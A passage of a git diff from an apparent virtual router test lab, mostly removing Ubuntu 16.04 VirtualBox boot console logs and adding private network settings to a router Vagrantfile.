EHCI PCI platform driver -[ 5.060875] ehci-platform: EHCI generic platform driver -[ 5.064221] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver -[ 5.069352] ohci-pci: OHCI PCI platform driver -[ 5.072265] ohci-platform: OHCI generic platform driver -[ 5.077051] uhci_hcd: USB Universal Host Controller Interface driver -[ 5.082575] i8042: PNP: PS/2 Controller [PNP0303:PS2K,PNP0f03:PS2M] at 0x60,0x64 irq 1,12 -[ 5.092808] serio: i8042 KBD port at 0x60,0x64 irq 1 -[ 5.106441] serio: i8042 AUX port at 0x60,0x64 irq 12 -[ 5.113218] mousedev: PS/2 mouse device common for all mice -[ 5.119953] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input2 -[ 5.127395] rtc_cmos rtc_cmos: rtc core: registered rtc_cmos as rtc0 -[ 5.127452] rtc_cmos rtc_cmos: alarms up to one day, 114 bytes nvram -[ 5.127460] i2c /dev entries driver -[ 5.127514] device-mapper: uevent: version 1.0.3 -[ 5.127568] device-mapper: ioctl: 4.34.0-ioctl (2015-10-28) initialised: dm-devel@redhat.com -[ 5.127584] ledtrig-cpu: registered to indicate activity on CPUs -[ 5.131420] NET: Registered protocol family 10 -[ 5.131613] NET: Registered protocol family 17 -[ 5.131626] Key type dns_resolver registered -[ 5.131865] registered taskstats version 1 -[ 5.131881] Loading compiled-in X.509 certificates -[ 5.132531] Loaded X.509 cert 'Build time autogenerated kernel key: b89e9ea735e1dbde81c7786f041ecf1d53e71c2e' -[ 5.132547] zswap: loaded using pool lzo/zbud -[ 5.134189] Key type trusted registered -[ 5.137564] Key type encrypted registered -[ 5.137570] AppArmor: AppArmor sha1 policy hashing enabled -[ 5.137573] ima: No TPM chip found, activating TPM-bypass! -[ 5.137581] ima: Allocated hash algorithm: sha1 -[ 5.137594] evm: HMAC attrs: 0x1 -[ 5.138019] Magic number: 5:763:654 -[ 5.145195] rtc_cmos rtc_cmos: setting system clock to 2021-01-25 22:38:15 UTC (1611614295) -[ 5.145356] BIOS EDD facility v0.16 2004-Jun-25, 0 devices found -[ 5.145356] EDD information not available. -[ 5.279204] Freeing unused kernel memory: 1492K -[ 5.299153] Write protecting the kernel read-only data: 14336k -[ 5.300762] Freeing unused kernel memory: 1592K -[ 5.310111] Freeing unused kernel memory: 56K -Loading, please wait... -starting version 229 -[ 5.340139] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 5.342381] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 5.342418] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 5.364180] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 5.364237] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 5.364394] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 5.364457] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 5.364520] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 5.364582] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 5.364645] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 5.892975] e1000: Intel(R) PRO/1000 Network Driver - version 7.3.21-k8-NAPI -[ 5.902549] e1000: Copyright (c) 1999-2006 Intel Corporation. -[ 5.905792] Fusion MPT base driver 3.04.20 -[ 5.907286] Copyright (c) 1999-2008 LSI Corporation -[ 5.913063] Fusion MPT SPI Host driver 3.04.20 -[ 5.959583] AVX2 version of gcm_enc/dec engaged. -[ 5.962012] AES CTR mode by8 optimization enabled -[ 6.134209] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input4 -[ 6.411492] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 02:83:3c:85:18:ff -[ 6.413799] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection -[ 6.418554] mptbase: ioc0: Initiating bringup -[ 6.770410] ioc0: LSI53C1030 A0: Capabilities={Initiator} -[ 7.686431] scsi host2: ioc0: LSI53C1030 A0, FwRev=00000000h, Ports=1, MaxQ=256, IRQ=20 -[ 8.380886] scsi 2:0:0:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 -[ 8.434252] scsi target2:0:0: Beginning Domain Validation -[ 8.464029] scsi target2:0:0: Domain Validation skipping write tests -[ 8.465220] scsi target2:0:0: Ending Domain Validation -[ 8.469614] scsi target2:0:0: asynchronous -[ 8.475155] scsi 2:0:1:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 -[ 8.476680] scsi target2:0:1: Beginning Domain Validation -[ 8.487346] scsi target2:0:1: Domain Validation skipping write tests -[ 8.488319] scsi target2:0:1: Ending Domain Validation -[ 8.489245] scsi target2:0:1: asynchronous -[ 8.508725] sd 2:0:0:0: Attached scsi generic sg0 type 0 -[ 8.515925] sd 2:0:1:0: Attached scsi generic sg1 type 0 -[ 8.517155] sd 2:0:0:0: [sda] 20971520 512-byte logical blocks: (10.7 GB/10.0 GiB) -[ 8.535921] sd 2:0:1:0: [sdb] 20480 512-byte logical blocks: (10.5 MB/10.0 MiB) -[ 8.537912] sd 2:0:1:0: [sdb] Write Protect is off -[ 8.540174] sd 2:0:0:0: [sda] Write Protect is off -[ 8.552986] sd 2:0:1:0: [sdb] Incomplete mode parameter data -[ 8.559195] sd 2:0:1:0: [sdb] Assuming drive cache: write through -[ 8.560626] sd 2:0:0:0: [sda] Incomplete mode parameter data -[ 8.567135] sd 2:0:0:0: [sda] Assuming drive cache: write through -[ 8.586569] sda: sda1 -[ 8.596111] sd 2:0:1:0: [sdb] Attached SCSI disk -[ 8.597620] sd 2:0:0:0: [sda] Attached SCSI disk -[ 8.798509] e1000 0000:00:08.0 eth1: (PCI:33MHz:32-bit) 08:00:27:e7:3f:6e -[ 8.806666] e1000 0000:00:08.0 eth1: Intel(R) PRO/1000 Network Connection -[ 9.182067] e1000 0000:00:09.0 eth2: (PCI:33MHz:32-bit) 08:00:27:d2:86:ba -[ 9.240559] e1000 0000:00:09.0 eth2: Intel(R) PRO/1000 Network Connection -[ 9.897233] e1000 0000:00:0a.0 eth3: (PCI:33MHz:32-bit) 08:00:27:b2:94:cd -[ 9.952689] e1000 0000:00:0a.0 eth3: Intel(R) PRO/1000 Network Connection -[ 9.957703] e1000 0000:00:03.0 enp0s3: renamed from eth0 -[ 9.983338] e1000 0000:00:08.0 enp0s8: renamed from eth1 -[ 10.013011] e1000 0000:00:09.0 enp0s9: renamed from eth2 -[ 10.023518] e1000 0000:00:0a.0 enp0s10: renamed from eth3 -Begin: Loading essential drivers ... [ 11.876086] md: linear personality registered for level -1 -[ 11.900745] md: multipath personality registered for level -4 -[ 11.989958] md: raid0 personality registered for level 0 -[ 12.027735] md: raid1 personality registered for level 1 -[ 12.139384] raid6: sse2x1 gen() 5524 MB/s -[ 12.207682] raid6: sse2x1 xor() 4575 MB/s -[ 12.283467] raid6: sse2x2 gen() 9003 MB/s -[ 12.352285] raid6: sse2x2 xor() 4327 MB/s -[ 12.436243] raid6: sse2x4 gen() 3815 MB/s -[ 12.518468] raid6: sse2x4 xor() 2724 MB/s -[ 12.602924] raid6: avx2x1 gen() 4400 MB/s -[ 12.712770] raid6: avx2x2 gen() 3708 MB/s -[ 12.789713] raid6: avx2x4 gen() 6461 MB/s -[ 12.803871] raid6: using algorithm sse2x2 gen() 9003 MB/s -[ 12.816004] raid6: .... xor() 4327 MB/s, rmw enabled -[ 12.846995] raid6: using avx2x2 recovery algorithm -[ 12.875217] xor: automatically using best checksumming function: -[ 12.962535] avx : 8341.000 MB/sec -[ 12.987770] async_tx: api initialized (async) -[ 13.096688] md: raid6 personality registered for level 6 -[ 13.112750] md: raid5 personality registered for level 5 -[ 13.133942] md: raid4 personality registered for level 4 -[ 13.228671] md: raid10 personality registered for level 10 -done. -Begin: Running /scripts/init-premount ... done. -Begin: Mounting root file system ... Begin: Running /scripts/local-top ... done. -Begin: Running /scripts/local-premount ... [ 13.408295] Btrfs loaded -Scanning for Btrfs filesystems -done. -Warning: fsck not present, so skipping root file system -[ 13.576087] EXT4-fs (sda1): INFO: recovery required on readonly filesystem -[ 13.581633] EXT4-fs (sda1): write access will be enabled during recovery -[ 13.615273] EXT4-fs (sda1): recovery complete -[ 13.622746] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null) -done. -Begin: Running /scripts/local-bottom ... done. -Begin: Running /scripts/init-bottom ... done. -[ 13.953558] systemd[1]: systemd 229 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ -LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN) -[ 13.975146] systemd[1]: Detected virtualization oracle. -[ 13.982654] systemd[1]: Detected architecture x86-64. - -Welcome to Ubuntu 16.04.7 LTS! - -[ 14.002048] systemd[1]: Set hostname to . -[ 14.117590] hrtimer: interrupt took 20866570 ns -[ 14.277484] random: nonblocking pool is initialized -[ 14.386343] systemd[1]: Created slice System Slice. -[ OK ] Created slice System Slice. -[ 14.475644] systemd[1]: Started Forward Password Requests to Wall Directory Watch. -[ OK ] Started Forward Password Requests to Wall Directory Watch. -[ 14.507362] systemd[1]: Started Trigger resolvconf update for networkd DNS. -[ OK ] Started Trigger resolvconf update for networkd DNS. -[ 14.523471] systemd[1]: Listening on Journal Socket (/dev/log). -[ OK ] Listening on Journal Socket (/dev/log). -[ 14.537790] systemd[1]: Reached target Encrypted Volumes. -[ OK ] Reached target Encrypted Volumes. -[ 14.587335] systemd[1]: Listening on LVM2 metadata daemon socket. -[ OK ] Listening on LVM2 metadata daemon socket. -[ 14.606569] systemd[1]: Listening on Device-mapper event daemon FIFOs. -[ OK ] Listening on Device-mapper event daemon FIFOs. -[ 14.634688] systemd[1]: Listening on Journal Audit Socket. -[ OK ] Listening on Journal Audit Socket. -[ 14.722344] systemd[1]: Reached target User and Group Name Lookups. -[ OK ] Reached target User and Group Name Lookups. -[ 14.734875] systemd[1]: Created slice system-serial\x2dgetty.slice. -[ OK ] Created slice system-serial\x2dgetty.slice. -[ 14.753275] systemd[1]: Listening on /dev/initctl Compatibility Named Pipe. -[ OK ] Listening on /dev/initctl Compatibility Named Pipe. -[ 14.770012] systemd[1]: Reached target Swap. -[ OK ] Reached target Swap. -[ 14.790145] systemd[1]: Listening on udev Control Socket. -[ OK ] Listening on udev Control Socket. -[ 14.794736] systemd[1]: Set up automount Arbitrary Executable File Formats File System Automount Point. -[ OK ] Set up automount Arbitrary Executab...ats File System Automount Point. -[ 14.826668] systemd[1]: Created slice User and Session Slice. -[ OK ] Created slice User and Session Slice. -[ 14.838920] systemd[1]: Reached target Slices. -[ OK ] Reached target Slices. -[ 14.844285] systemd[1]: Listening on Syslog Socket. -[ OK ] Listening on Syslog Socket. -[ 14.868641] systemd[1]: Listening on Journal Socket. -[ OK ] Listening on Journal Socket. -[ 14.903224] systemd[1]: Mounting Huge Pages File System... - Mounting Huge Pages File System... -[ 14.927380] systemd[1]: Mounting POSIX Message Queue File System... - Mounting POSIX Message Queue File System... -[ 14.966424] systemd[1]: Starting Uncomplicated firewall... - Starting Uncomplicated firewall... -[ 15.001536] systemd[1]: Starting Monitoring of LVM2 mirrors, snapshots etc. using dmeventd or progress polling... - Starting Monitoring of LVM2 mirrors... dmeventd or progress polling... -[ 15.038910] systemd[1]: Starting Set console keymap... - Starting Set console keymap... -[ 15.095349] systemd[1]: Starting Load Kernel Modules... - Starting Load Kernel Modules... -[ 15.123932] systemd[1]: Starting Nameserver information manager... - Starting Nameserver information manager... -[ 15.151905] systemd[1]: Mounting Debug File System... - Mounting Debug File System... -[ 15.174694] systemd[1]: Reached target System Time Synchronized. -[ OK ] Reached target System Time Synchronized. -[ 15.242421] Loading iSCSI transport class v2.0-870. -[ 15.257178] systemd[1]: Starting Remount Root and Kernel File Systems... - Starting Remount Root and Kernel File Systems...[ 15.264304] EXT4-fs (sda1): re-mounted. Opts: (null) - -[ 15.275108] systemd[1]: Listening on udev Kernel Socket. -[ OK ] Listening on udev Kernel Socket. -[ 15.285286] systemd[1]: Starting Journal Service... -[ 15.296665] iscsi: registered transport (tcp) - Starting Journal Service... -[ 15.304596] systemd[1]: Listening on LVM2 poll daemon socket. -[ OK ] Listening on LVM2 poll daemon socket. -[ 15.328542] systemd[1]: Starting Create list of required static device nodes for the current kernel... - Starting Create list of required st... nodes for the current kernel... -[ 15.360027] systemd[1]: Mounted Debug File System. -[ OK ] Mounted Debug File System. -[ 15.366053] systemd[1]: Mounted Huge Pages File System. -[ OK ] Mounted Huge Pages File System. -[ 15.395624] systemd[1]: Mounted POSIX Message Queue File System. -[ OK ] Mounted POSIX Message Queue File System. -[ 15.416198] systemd[1]: Started Uncomplicated firewall. -[ OK ] Started Uncomplicated firewall. -[ 15.445833] systemd[1]: Started Set console keymap. -[ OK ] Started Set console keymap. -[ 15.481822] systemd[1]: Started Remount Root and Kernel File Systems. -[ OK ] Started Remount Root and Kernel File Systems. -[ 15.503935] systemd[1]: Started Create list of required static device nodes for the current kernel. -[ OK ] Started Create list of required sta...ce nodes for the current kernel. -[ 15.536187] systemd[1]: Started Nameserver information manager. -[ OK ] Started Nameserver information manager. -[ 15.543431] systemd[1]: Started Journal Service. -[ OK ] Started Journal Service. -[ OK [ 15.602027] iscsi: registered transport (iser) -] Started LVM2 metadata daemon. - Starting Create Static Device Nodes in /dev... - Starting Load/Save Random Seed... - Starting udev Coldplug all Devices... - Starting Flush Journal to Persistent Storage... -[ OK ] Started Load Kernel Modules. -[ OK ] Started Load/Save Random Seed. - Starting Apply Kernel Variables... - Mounting FUSE Control File System... -[ OK ] Mounted FUSE Control File System. -[ OK ] Started Create Static Device Nodes in /dev. -[ OK ] Started Apply Kernel Variables. - Starting udev Kernel Device Manager... -[ OK ] Started Flush Journal to Persistent Storage. -[ OK ] Started Monitoring of LVM2 mirrors,...ng dmeventd or progress polling. -[ OK ] Started udev Coldplug all Devices. -[ OK ] Reached target Local File Systems (Pre). -[ OK ] Reached target Local File Systems. - Starting Create Volatile Files and Directories... - Starting LSB: AppArmor initialization... - Starting Tell Plymouth To Write Out Runtime Data... - Starting Set console font and keymap... - Starting Initial cloud-init job (pre-networking)... -[ OK ] Started udev Kernel Device Manager. -[ OK ] Started Tell Plymouth To Write Out Runtime Data. -[ OK ] Started Create Volatile Files and Directories. - Starting Update UTMP about System Boot/Shutdown... -[ OK ] Started Dispatch Password Requests to Console Directory Watch. -[ OK ] Started Update UTMP about System Boot/Shutdown. -[ OK ] Started LSB: AppArmor initialization. - Starting Load AppArmor profiles managed internally by snapd... -[ OK ] Started Load AppArmor profiles managed internally by snapd. -[ OK ] Found device /dev/ttyS0. -[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). -[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). -[ OK ] Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch. -[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). -[ OK ] Started Set console font and keymap. -[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). -[ OK ] Created slice system-getty.slice. -[ 18.329629] cloud-init[489]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init-local' at Mon, 25 Jan 2021 22:38:30 +0000. Up 16.92 seconds. -[ OK ] Started Initial cloud-init job (pre-networking). -[ OK ] Reached target Network (Pre). - Starting Raise network interfaces... -[ OK ] Started ifup for enp0s9. -[ OK ] Started ifup for enp0s10. -[ OK ] Started ifup for enp0s3. -[ OK ] Started ifup for enp0s8. -[ OK ] Started Raise network interfaces. -[ OK ] Reached target Network. - Starting Initial cloud-init job (metadata service crawler)... -[ 20.783277] cloud-init[1306]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init' at Mon, 25 Jan 2021 22:38:33 +0000. Up 20.09 seconds. -[ OK [ 20.913574] cloud-init[1306]: ci-info: +++++++++++++++++++++++++++++++++++++++Net device info+++++++++++++++++++++++++++++++++++++++] Started Initial cloud-init job (metadata service crawler). -[ OK ] Reached target Cloud-config availability. -[ OK ] Reached target System Initialization. - -[ 20.930668] cloud-init[1306]: ci-info: +---------+------+-----------------------------+---------------+--------+-------------------+ -[ 21.229438] cloud-init[1306]: ci-info: | Device | Up | Address | Mask | Scope | Hw-Address | -[ OK ] Started ACPI Events Check. -[ 21.287888] cloud-init[1306]: ci-info: +---------+------+-----------------------------+---------------+--------+-------------------+ -[ 21.299080] cloud-init[1306]: [ OK ] Reached target Paths. -ci-info: | enp0s10 | True | 192.168.102.2 | 255.255.255.0 | global | 08:00:27:b2:94:cd | -[ OK ] Started Daily apt download activities. -[ 21.320858] cloud-init[1306]: ci-info: | enp0s10 | True | fe80::a00:27ff:feb2:94cd/64 | . | link | 08:00:27:b2:94:cd | -[ 21.339052] cloud-init[1306]: ci-info: | enp0s3 | True | 10.0.2.15 | 255.255.255.0 | global | 02:83:3c:85:18:ff | - Starting LXD - unix socket. -[ 21.346661] cloud-init[1306]: ci-info: | enp0s3 | True | fe80::83:3cff:fe85:18ff/64 | . | link | 02:83:3c:85:18:ff | -[ 21.346992] cloud-init[1306]: ci-info: | enp0s8 | True | 192.168.2.254 | 255.255.255.0 | global | 08:00:27:e7:3f:6e | -[ 21.347056] cloud-init[1306]: ci-info: | enp0s8 | True | fe80::a00:27ff:fee7:3f6e/64 | . | link | 08:00:27:e7:3f:6e | -[ 21.347115] cloud-init[1306]: ci-info: | enp0s9 | True | 192.168.100.2 | 255.255.255.0 | global | 08:00:27:d2:86:ba | -[ 21.347171] cloud-init[1306]: ci-info: | enp0s9 | True | fe80::a00:27ff:fed2:86ba/64 | . | link | 08:00:27:d2:86:ba | -[ 21.347235] cloud-init[1306]: ci-info: | lo | True | 127.0.0.1 | 255.0.0.0 | host | . | -[ 21.347289] cloud-init[1306]: ci-info: | lo | True | ::1/128 | . | host | . | -[ 21.347337] cloud-init[1306]: ci-info: +---------+------+-----------------------------+---------------+--------+-------------------+ -[ 21.347388] cloud-init[1306]: ci-info: ++++++++++++++++++++++++++++Route IPv4 info+++++++++++++++++++++++++++++ -[ 21.347450] cloud-init[1306]: ci-info: +-------+---------------+----------+---------------+-----------+-------+ -[ 21.347518] cloud-init[1306]: ci-info: | Route | Destination | Gateway | Genmask | Interface | Flags | -[ 21.347576] cloud-init[1306]: ci-info: +-------+---------------+----------+---------------+-----------+-------+ -[ 21.347775] cloud-init[1306]: ci-info: | 0 | 0.0.0.0 | 10.0.2.2 | 0.0.0.0 | enp0s3 | UG | -[ 21.347844] cloud-init[1306]: ci-info: | 1 | 10.0.2.0 | 0.0.0.0 | 255.255.255.0 | enp0s3 | U | -[ 21.347906] cloud-init[1306]: ci-info: | 2 | 192.168.2.0 | 0.0.0.0 | 255.255.255.0 | enp0s8 | U | -[ 21.348031] cloud-init[ OK ] Started Daily apt upgrade and clean activities. - Starting Socket activation for snappy daemon. -[ OK ] Started Daily Cleanup of Temporary Directories. -[ OK ] Listening on ACPID Listen Socket. -[ OK ] Started Message of the Day. -[ OK ] Reached target Timers. -[ OK ] Listening on D-Bus System Message Bus Socket. -[ OK ] Listening on UUID daemon activation socket. -[ OK ] Reached target Network is Online. -[1306]: ci-info: | 3 | 192.168.100.0 | 0.0.0.0 | 255.255.255.0 | enp0s9 | U | -[ 21.917580] cloud-init[1306]: ci-info: | 4 | 192.168.102.0 | 0.0.0.0 | 255.255.255.0 | enp0s10 | U | - Starting iSCSI initiator daemon (iscsid)... -[ OK ] Listening on LXD - unix socket. -[ 21.961999] cloud-init[1306]: ci-info: +-------+---------------+----------+---------------+-----------+-------+ -[ 22.129035] cloud-init[1306]: ci-info: +++++++++++++++++++Route IPv6 info+++++++++++++++++++ -[ OK ] Listening on Socket activation for snappy daemon. -[ 22.191402] cloud-init[1306]: ci-info: +-------+-------------+---------+-----------+-------+ -[ 22.284476] cloud-init[1306]: ci-info: | Route | Destination | Gateway | Interface | Flags | -[ 22.290177] cloud-init[1306]: ci-info: +-------+-------------+---------+-----------+-------+ -[ 22.290231] cloud-init[1306]: ci-info: | 0 | fe80::/64 | :: | enp0s9 | U | -[ 22.290277] cloud-init[1306]: ci-info: | 1 | fe80::/64 | :: | enp0s10 | U | -[ 22.290314] cloud-init[1306]: ci-info: | 2 | fe80::/64 | :: | enp0s8 | U | -[ 22.290350] cloud-init[1306]: ci-info: | 3 | fe80::/64 | :: | enp0s3 | U | -[ 22.290415] cloud-init[1306]: ci-info: | 9 | ff00::/8 | :: | enp0s9 | U | -[ OK ] Reached target Sockets. -[ OK ] Reached target Basic System. -[ 22.290864] cloud-init[1306]: ci-info: | 10 | ff00::/8 | :: | enp0s10 | U | -[ 22.665538] [cloud-init OK [1306]: ] ci-info: | 11 | ff00::/8 | :: | enp0s8 | U |Started FUSE filesystem for LXC. - -[ 22.666029] cloud-init[1306]: ci-info: | 12 | ff00::/8 | :: | enp0s3 | U | -[ 22.838646] cloud-init[1306]: ci-info: +-------+-------------+---------+-----------+-------+ - Starting LSB: MD monitoring daemon... -[ OK ] Started Deferred execution scheduler. - Starting System Logging Service... - Starting Accounts Service... -[ OK ] Started ACPI event daemon. - Starting LSB: Record successful boot for GRUB... - Starting Login Service... - Starting /etc/rc.local Compatibility... -[ OK ] Started Regular background program processing daemon. - Starting Snap Daemon... - Starting OpenBSD Secure Shell server... -[ OK ] Started D-Bus System Message Bus. - Starting Virtualbox guest utils... - Starting LXD - container startup/shutdown... -[ OK ] Started System Logging Service. -[ OK ] Started iSCSI initiator daemon (iscsid). -[ OK ] Started /etc/rc.local Compatibility. -[ OK ] Started OpenBSD Secure Shell server. -[ OK ] Started Login Service. -[ OK ] Started Unattended Upgrades Shutdown. - Starting Authenticate and Authorize Users to Run Privileged Tasks... - Starting Login to default iSCSI targets... -[ OK ] Started LSB: MD monitoring daemon. -[ OK ] Started LSB: Record successful boot for GRUB. -[ OK ] Started Authenticate and Authorize Users to Run Privileged Tasks. -[ OK ] Started Virtualbox guest utils. -[ OK ] Started Accounts Service. -[ OK ] Started LXD - container startup/shutdown. -[ OK ] Started Snap Daemon. -[ OK ] Started Login to default iSCSI targets. -[ OK ] Reached target Remote File Systems (Pre). -[ OK ] Reached target Remote File Systems. - Starting LSB: start and stop the Quagga routing suite... - Starting Permit User Sessions... - Starting LSB: automatic crash report generation... - Starting LSB: Set the CPU Frequency Scaling governor to "ondemand"... - Starting LSB: daemon to balance interrupts for SMP systems... - Starting Wait until snapd is fully seeded... -[ OK ] Started Permit User Sessions. - Starting Terminate Plymouth Boot Screen... - Starting Hold until boot process finishes up... -[ OK ] Started Wait until snapd is fully seeded. -[ OK ] Started Terminate Plymouth Boot Screen. -[ OK ] Started Hold until boot process finishes up. -[ OK ] Started Getty on tty1. - Starting Set console scheme... -[ OK ] Started Serial Getty on ttyS0. -[ OK ] Reached target Login Prompts. - Starting Apply the settings specified in cloud-config... -[ OK ] Started LSB: start and stop the Quagga routing suite. -[ OK ] Started LSB: automatic crash report generation. -[ OK ] Started LSB: Set the CPU Frequency Scaling governor to "ondemand". -[ OK ] Started LSB: daemon to balance interrupts for SMP systems. -[ OK ] Started Set console scheme. -[ OK ] Reached target Multi-User System. -[ OK ] Reached target Graphical Interface. - Starting Update UTMP about System Runlevel Changes... -[ OK ] Started Update UTMP about System Runlevel Changes. -[ 27.074370] cloud-init[1604]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:config' at Mon, 25 Jan 2021 22:38:40 +0000. Up 26.85 seconds. -[ OK ] Started Apply the settings specified in cloud-config. - Starting Execute cloud user/final scripts... -[ 27.980290] cloud-init[1618]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:final' at Mon, 25 Jan 2021 22:38:41 +0000. Up 27.80 seconds. -[ 28.010860] cloud-init[1618]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 finished at Mon, 25 Jan 2021 22:38:41 +0000. Datasource DataSourceNoCloud [seed=/dev/sdb][dsmode=net]. Up 27.97 seconds -[ OK ] Started Execute cloud user/final scripts. -[ OK ] Reached target Cloud-init target. - -Ubuntu 16.04.7 LTS router22 ttyS0 - -router22 login: \ No newline at end of file diff --git a/virtual-test-environment/routers/router3/.vagrant/machines/default/virtualbox/vagrant_cwd b/virtual-test-environment/routers/router3/.vagrant/machines/default/virtualbox/vagrant_cwd deleted file mode 100644 index 929aaec..0000000 --- a/virtual-test-environment/routers/router3/.vagrant/machines/default/virtualbox/vagrant_cwd +++ /dev/null @@ -1 +0,0 @@ -/home/jive/space/gittin/VeepExploit/virt-lab/routers/router3 \ No newline at end of file diff --git a/virtual-test-environment/routers/router3/Vagrantfile b/virtual-test-environment/routers/router3/Vagrantfile index 60e8d1d..bed7206 100644 --- a/virtual-test-environment/routers/router3/Vagrantfile +++ b/virtual-test-environment/routers/router3/Vagrantfile @@ -1,5 +1,4 @@ # -*- mode: ruby -*- - # vi: set ft=ruby : Vagrant.configure(2) do |config| @@ -8,8 +7,11 @@ Vagrant.configure(2) do |config| config.vm.network "forwarded_port", guest: 22, host: 22116, id: 'ssh' config.ssh.insert_key = true + config.vm.network "private_network", ip: "192.168.3.254", virtualbox__intnet: "intnet-3" + config.vm.network "private_network", ip: "192.168.101.1", virtualbox__intnet: "intnet-101" + config.vm.network "private_network", ip: "192.168.102.1", virtualbox__intnet: "intnet-102" config.vm.provider "virtualbox" do |vb| diff --git a/virtual-test-environment/routers/router3/ubuntu-xenial-16.04-cloudimg-console.log b/virtual-test-environment/routers/router3/ubuntu-xenial-16.04-cloudimg-console.log deleted file mode 100644 index f16ecc6..0000000 --- a/virtual-test-environment/routers/router3/ubuntu-xenial-16.04-cloudimg-console.log +++ /dev/null @@ -1,663 +0,0 @@ -[ 0.000000] Initializing cgroup subsys cpuset -[ 0.000000] Initializing cgroup subsys cpu -[ 0.000000] Initializing cgroup subsys cpuacct -[ 0.000000] Linux version 4.4.0-190-generic (buildd@lcy01-amd64-026) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12) ) #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 (Ubuntu 4.4.0-190.220-generic 4.4.233) -[ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 -[ 0.000000] KERNEL supported cpus: -[ 0.000000] Intel GenuineIntel -[ 0.000000] AMD AuthenticAMD -[ 0.000000] Centaur CentaurHauls -[ 0.000000] x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256 -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x01: 'x87 floating point registers' -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x02: 'SSE registers' -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x04: 'AVX registers' -[ 0.000000] x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' format. -[ 0.000000] e820: BIOS-provided physical RAM map: -[ 0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable -[ 0.000000] BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved -[ 0.000000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved -[ 0.000000] BIOS-e820: [mem 0x0000000000100000-0x000000003ffeffff] usable -[ 0.000000] BIOS-e820: [mem 0x000000003fff0000-0x000000003fffffff] ACPI data -[ 0.000000] BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved -[ 0.000000] BIOS-e820: [mem 0x00000000fee00000-0x00000000fee00fff] reserved -[ 0.000000] BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved -[ 0.000000] NX (Execute Disable) protection: active -[ 0.000000] SMBIOS 2.5 present. -[ 0.000000] Hypervisor detected: KVM -[ 0.000000] e820: last_pfn = 0x3fff0 max_arch_pfn = 0x400000000 -[ 0.000000] MTRR: Disabled -[ 0.000000] x86/PAT: MTRRs disabled, skipping PAT initialization too. -[ 0.000000] CPU MTRRs all blank - virtualized system. -[ 0.000000] x86/PAT: Configuration [0-7]: WB WT UC- UC WB WT UC- UC -[ 0.000000] found SMP MP-table at [mem 0x0009fff0-0x0009ffff] mapped at [ffff88000009fff0] -[ 0.000000] Scanning 1 areas for low memory corruption -[ 0.000000] RAMDISK: [mem 0x362000-0x37167fff] -[ 0.000000] ACPI: Early table checksum verification disabled -[ 0.000000] ACPI: RSDP 0x00000000000E0000 000024 (v02 VBOX ) -[ 0.000000] ACPI: XSDT 0x000000003FFF0030 00003C (v01 VBOX VBOXXSDT 00000001 ASL 00000061) -[ 0.000000] ACPI: FACP 0x000000003FFF00F0 0000F4 (v04 VBOX VBOXFACP 00000001 ASL 00000061) -[ 0.000000] ACPI: DSDT 0x000000003FFF0470 0021FF (v02 VBOX VBOXBIOS 00000002 INTL 20180105) -[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 -[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 -[ 0.000000] ACPI: APIC 0x000000003FFF0240 00005C (v02 VBOX VBOXAPIC 00000001 ASL 00000061) -[ 0.000000] ACPI: SSDT 0x000000003FFF02A0 0001CC (v01 VBOX VBOXCPUT 00000002 INTL 20180105) -[ 0.000000] No NUMA configuration found -[ 0.000000] Faking a node at [mem 0x0000000000000000-0x000000003ffeffff] -[ 0.000000] NODE_DATA(0) allocated [mem 0x3ffeb000-0x3ffeffff] 